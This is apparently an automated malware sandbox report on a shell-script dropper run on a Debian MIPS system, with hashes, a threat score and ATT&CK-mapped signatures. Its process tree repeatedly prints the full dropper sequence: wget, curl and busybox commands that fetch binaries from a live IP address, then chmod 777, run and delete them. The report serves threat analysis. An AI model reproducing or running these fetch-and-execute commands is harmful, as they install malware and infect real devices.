Analysis
-
max time kernel
85s -
max time network
88s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
-
submitted
20/11/2024, 03:36
General
-
Target
d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh
-
Size
10KB
-
MD5
60d3e08d3789ef89393cd2b3a31e61be
-
SHA1
cc287b71403fb4ac25bc50ebbe29aad36a61ecae
-
SHA256
d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76
-
SHA512
62c179d023d47de2cb4be463d9c5a8d03363ef90880ef4b318132eb7fe9d8d14c76bc9214ca67ac52958c066a0858a5893842b02ea9fe22a60e78accf5a03c37
-
SSDEEP
192:m/L5dFkBBQh7DH7xvx7xWpRF8s808UBdB7EMtk7/Lj8ET7Awp/LYLvfJpwaz3MBO:mhFZtWpRuJBUBdBWD5gQZtWpR2JBUBdf
Score
7/10
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
Reads runtime system information 28 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh1⤵
-
/bin/rm/bin/rm bins.sh2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk2⤵
-
-
/bin/chmodchmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk2⤵
- File and Directory Permissions Modification
-
-
/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk2⤵
- Executes dropped EXE
-
-
/bin/rmrm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko22⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko22⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko22⤵
-
-
/bin/chmodchmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko22⤵
- File and Directory Permissions Modification
-
-
/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko22⤵
- Executes dropped EXE
-
-
/bin/rmrm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko22⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy2⤵
-
-
/bin/chmodchmod 777 CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy2⤵
- File and Directory Permissions Modification
-
-
/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy./CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy2⤵
- Executes dropped EXE
-
-
/bin/rmrm CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N02⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N02⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N02⤵
-
-
/bin/chmodchmod 777 RzEVu6pAAr042B882SzgMD8PjjI9QXS9N02⤵
- File and Directory Permissions Modification
-
-
/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0./RzEVu6pAAr042B882SzgMD8PjjI9QXS9N02⤵
- Executes dropped EXE
-
-
/bin/rmrm RzEVu6pAAr042B882SzgMD8PjjI9QXS9N02⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd2⤵
- System Network Configuration Discovery
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod 777 g94Q6IpdHco1kY4euvU50notlQI0EU32gd2⤵
- File and Directory Permissions Modification
-
-
/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd./g94Q6IpdHco1kY4euvU50notlQI0EU32gd2⤵
- Executes dropped EXE
- System Network Configuration Discovery
-
-
/bin/rmrm g94Q6IpdHco1kY4euvU50notlQI0EU32gd2⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg2⤵
-
-
/bin/chmodchmod 777 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg2⤵
- File and Directory Permissions Modification
-
-
/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg./0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg2⤵
- Executes dropped EXE
-
-
/bin/rmrm 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs2⤵
-
-
/bin/chmodchmod 777 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs2⤵
- File and Directory Permissions Modification
-
-
/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs./4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs2⤵
- Executes dropped EXE
-
-
/bin/rmrm 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO12⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO12⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO12⤵
-
-
/bin/chmodchmod 777 c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO12⤵
- File and Directory Permissions Modification
-
-
/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1./c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO12⤵
- Executes dropped EXE
-
-
/bin/rmrm c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO12⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ2⤵
-
-
/bin/chmodchmod 777 Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ2⤵
- File and Directory Permissions Modification
-
-
/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ./Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ2⤵
- Executes dropped EXE
-
-
/bin/rmrm Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB2⤵
-
-
/bin/chmodchmod 777 Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB2⤵
- File and Directory Permissions Modification
-
-
/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB./Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB2⤵
- Executes dropped EXE
-
-
/bin/rmrm Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV2⤵
-
-
/bin/chmodchmod 777 fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV2⤵
- File and Directory Permissions Modification
-
-
/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV./fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV2⤵
- Executes dropped EXE
-
-
/bin/rmrm fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL2⤵
-
-
/bin/chmodchmod 777 d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL2⤵
- File and Directory Permissions Modification
-
-
/tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL./d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL2⤵
- Executes dropped EXE
-
-
/bin/rmrm d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO2⤵
-
-
/bin/chmodchmod 777 l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO2⤵
- File and Directory Permissions Modification
-
-
/tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO./l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO2⤵
- Executes dropped EXE
-
-
/bin/rmrm l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ2⤵
-
-
/bin/chmodchmod 777 HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ2⤵
- File and Directory Permissions Modification
-
-
/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ./HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ2⤵
- Executes dropped EXE
-
-
/bin/rmrm HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy2⤵
-
-
/bin/chmodchmod 777 CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy2⤵
- File and Directory Permissions Modification
-
-
/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy./CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy2⤵
- Executes dropped EXE
-
-
/bin/rmrm CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk2⤵
-
-
/bin/chmodchmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk2⤵
- File and Directory Permissions Modification
-
-
/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk2⤵
- Executes dropped EXE
-
-
/bin/rmrm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko22⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko22⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko22⤵
-
-
/bin/chmodchmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko22⤵
- File and Directory Permissions Modification
-
-
/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko22⤵
- Executes dropped EXE
-
-
/bin/rmrm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko22⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO12⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO12⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO12⤵
-
-
/bin/chmodchmod 777 c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO12⤵
- File and Directory Permissions Modification
-
-
/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1./c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO12⤵
- Executes dropped EXE
-
-
/bin/rmrm c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO12⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N02⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N02⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N02⤵
-
-
/bin/chmodchmod 777 RzEVu6pAAr042B882SzgMD8PjjI9QXS9N02⤵
- File and Directory Permissions Modification
-
-
/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0./RzEVu6pAAr042B882SzgMD8PjjI9QXS9N02⤵
- Executes dropped EXE
-
-
/bin/rmrm RzEVu6pAAr042B882SzgMD8PjjI9QXS9N02⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd2⤵
- System Network Configuration Discovery
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod 777 g94Q6IpdHco1kY4euvU50notlQI0EU32gd2⤵
- File and Directory Permissions Modification
-
-
/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd./g94Q6IpdHco1kY4euvU50notlQI0EU32gd2⤵
- Executes dropped EXE
- System Network Configuration Discovery
-
-
/bin/rmrm g94Q6IpdHco1kY4euvU50notlQI0EU32gd2⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg2⤵
-
-
/bin/chmodchmod 777 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg2⤵
- File and Directory Permissions Modification
-
-
/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg./0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg2⤵
- Executes dropped EXE
-
-
/bin/rmrm 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs2⤵
-
-
/bin/chmodchmod 777 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs2⤵
- File and Directory Permissions Modification
-
-
/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs./4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs2⤵
- Executes dropped EXE
-
-
/bin/rmrm 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ2⤵
-
-
/bin/chmodchmod 777 Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ2⤵
- File and Directory Permissions Modification
-
-
/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ./Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ2⤵
- Executes dropped EXE
-
-
/bin/rmrm Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ2⤵
-
-
/bin/chmodchmod 777 HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ2⤵
- File and Directory Permissions Modification
-
-
/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ./HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ2⤵
- Executes dropped EXE
-
-
/bin/rmrm HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB2⤵
-
-
/bin/chmodchmod 777 Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB2⤵
- File and Directory Permissions Modification
-
-
/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB./Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB2⤵
- Executes dropped EXE
-
-
/bin/rmrm Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV2⤵
-
-
/bin/chmodchmod 777 fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV2⤵
- File and Directory Permissions Modification
-
-
/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV./fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV2⤵
- Executes dropped EXE
-
-
/bin/rmrm fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL2⤵
-
-
/bin/chmodchmod 777 d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL2⤵
- File and Directory Permissions Modification
-
-
/tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL./d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL2⤵
- Executes dropped EXE
-
-
/bin/rmrm d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL2⤵
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO2⤵
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO2⤵
-
-
/bin/chmodchmod 777 l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO2⤵
- File and Directory Permissions Modification
-
-
/tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO./l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO2⤵
- Executes dropped EXE
-
-
/bin/rmrm l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97